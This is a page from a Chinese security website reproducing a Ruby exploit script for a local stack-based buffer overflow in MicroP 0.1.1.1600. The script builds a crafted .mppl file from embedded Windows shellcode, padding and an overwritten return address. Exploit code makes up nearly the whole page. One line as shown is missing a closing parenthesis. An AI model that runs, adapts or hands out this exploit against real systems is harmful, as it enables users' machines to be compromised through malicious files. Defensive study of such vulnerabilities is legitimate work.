首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow
来源:http://www.ncoskun.com 作者:COSKUN 发布时间:2014-03-17  
#!/usr/bin/env ruby
# Exploit Title:MicroP(.mppl) Local Stack Based Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Blog  : http://www.ncoskun.com http://www.grisapka.org
# Vendor :http://sourceforge.net/projects/microp/
# Software link:http://sourceforge.net/projects/microp/files/latest/download
# version: 0.1.1.1600
# Tested on: windows XP sp2
# 4ewa2getha! ;)
  
print "\n"
  print "\n"
  print "   by\n"                                      
  print "    _       _                   _  v2 _   \n"
  print "   | |_ ___| |_ ___ _ _ ___ ___|_|___|_|  \n"
  print "   | . | .'| . | .'| | | .'|  _| |_ -| |  \n"
  print "   |___|__,|___|__,|_  |__,|_| |_|___|_|  \n"
  print "                   |___|                  \n"                
  print "                                          \n"
  print "\n"
  print "\n"
       
  
#shellcode = http://www.exploit-db.com/exploits/28996/ 
#User32-free Messagebox Shellcode for any Windows version
   
 babacode =
   "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
   "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
   "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
   "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
   "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
   "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
   "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
   "\x49\x0b\x31\xc0\x51\x50\xff\xd7"
dolgu = "\x41" * 1163 
eip = [0x100145B5].pack('V'
  
bumbala=babacode+dolgu+eip
  
File.open('baba.mppl', 'w') do |bofdosya|  
bofdosya.puts (bumbala)
bofdosya.close()
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Firefox Exec Shellcode From Pr
·Free Download Manager 3.x Buff
·Zoo 2.10 - Parse.c Local Buffe
·OS X / Safari / Firefox REGEX
·Ruby Gem Arabic Prawn 0.0.1 Co
·iOS 7 Arbitrary Code Execution
·Trixbox Pro Remote Command Exe
·Gold MP4 Player 3.3 - Universa
·Oracle VirtualBox 3D Accelerat
·Yokogawa CENTUM CS 3000 BKBCop
·HP-UX rlpdaemon local exploit
·Yokogawa CENTUM CS 3000 BKHOde
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved